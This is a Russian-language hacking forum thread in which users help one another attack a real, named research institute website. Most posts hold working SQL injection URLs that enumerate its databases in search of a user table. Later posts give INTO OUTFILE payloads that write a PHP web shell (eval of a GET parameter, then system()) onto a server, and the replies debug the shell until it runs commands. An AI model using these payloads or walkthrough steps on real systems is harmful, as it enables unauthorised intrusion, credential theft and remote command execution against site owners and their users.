 |
|
14.03.2015, 00:50
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
Сообщение от faza02
Код:
http://www.ids-mannheim.de/cosmas2//projekt/referenz/korpora1.html?sigle=T13&archiv=W%27+union+select+1,2,3,4,5,6,7,version(),9--+&id=0
может лучше так? лучше, только не та база(
|
|
|
14.03.2015, 00:56
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от DezMond™
лучше, только не та база(
лень перебрать пять строчек лимита?
Код:
http://www.ids-mannheim.de/cosmas2//projekt/referenz/korpora1.html?sigle=T13&archiv=W%27+div+0+union+select+1,2,3,4,5,6,7,schema_name,9+from+information_schema.schemata+limit+3,1--+
|
|
|
|
14.03.2015, 09:29
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
Сообщение от faza02
лень перебрать пять строчек лимита?
Код:
http://www.ids-mannheim.de/cosmas2//projekt/referenz/korpora1.html?sigle=T13&archiv=W%27+div+0+union+select+1,2,3,4,5,6,7,schema_name,9+from+information_schema.schemata+limit+3,1--+
я все ввидел эти базы, не они, мне нужна таблица be_users
тут не в одной таблице нету(
|
|
|
|
14.03.2015, 10:05
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от DezMond™
я все ввидел эти базы, не они, мне нужна таблица be_users
тут не в одной таблице нету(
не понимаю. если вы не нашли вывод, откуда вы знаете, что эта таблица там есть?
вот ваша sqli:
Код:
http://www1.ids-mannheim.de/oea/forsch/forsch1.html?database=projekte
database: projekte
Код:
http://www.ids-mannheim.de/cosmas2//projekt/referenz/korpora1.html?sigle=T13&archiv=W%27+div+0+union+select+1,2,3,4,5,6,7,schema_name,9+from+information_schema.schemata+limit+3,1--+
вывод: Archiv: projekte
т. е. серв mysql, вероятно, один.
|
|
|
|
14.03.2015, 13:10
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Пытаюсь загрузить шелл через SQL-инъекцию
Код:
'-1'+union+select+1,2,0x273c3f706870206576616c28245f4745545b9165925d29203f3e27,4,5,6,7+from+mysql.user+into+outfile+'/usr/local/www/data/l00k.php'+--+
При обращении к localhost/l00k.php -
выдаёт
Parse error: syntax error, unexpected T_LNUMBER, expecting ']' in /usr/local/www/data/l00k.php on line 1 |
|
|
|
14.03.2015, 13:17
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от Unknowhacker
Пытаюсь загрузить шелл через SQL-инъекцию
Код:
'-1'+union+select+1,2,0x273c3f706870206576616c28245f4745545b9165925d29203f3e27,4,5,6,7+from+mysql.user+into+outfile+'/usr/local/www/data/l00k.php'+--+
При обращении к localhost/l00k.php -
выдаёт
Parse error: syntax error, unexpected T_LNUMBER, expecting ']' in /usr/local/www/data/l00k.php on line 1 зачем текст шелла в кавычках и сверху еще hex?
у вас там и так все нормально льется.
Код:
union+select+1,2,%27%27,4,5,6,7+from+mysql.user+into+outfile+%27/usr/local/www/data/555.php%27--+
|
|
|
|
14.03.2015, 13:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Сообщение от Unknowhacker
Пытаюсь загрузить шелл через SQL-инъекцию
Код:
'-1'+union+select+1,2,0x273c3f706870206576616c28245f4745545b9165925d29203f3e27,4,5,6,7+from+mysql.user+into+outfile+'/usr/local/www/data/l00k.php'+--+
При обращении к localhost/l00k.php -
выдаёт
Parse error: syntax error, unexpected T_LNUMBER, expecting ']' in /usr/local/www/data/l00k.php on line 1 у Вас кавычки в гет параметра e неправильны еще в добавок! Вы с ворда наверно вставляли)
|
|
|
|
14.03.2015, 13:24
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Сообщение от faza02
у вас там и так все нормально льется.
Нет, 1 2
Warning: system() [function.system]: Cannot execute a blank command in /usr/local/www/data/555.php on line 1
4 5 6 7
|
|
|
|
14.03.2015, 13:27
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
ну так попробуйте выполнить ls, например
|
|
|
|
14.03.2015, 13:50
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от Unknowhacker
Нет, 1 2
Warning: system() [function.system]: Cannot execute a blank command in /usr/local/www/data/555.php on line 1
4 5 6 7
blank - пустой
Вы вызываете шелл-код с пустыми параметрами.
Как и сказал faza02 передайте какой-либо аргумент в функцию вызова.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
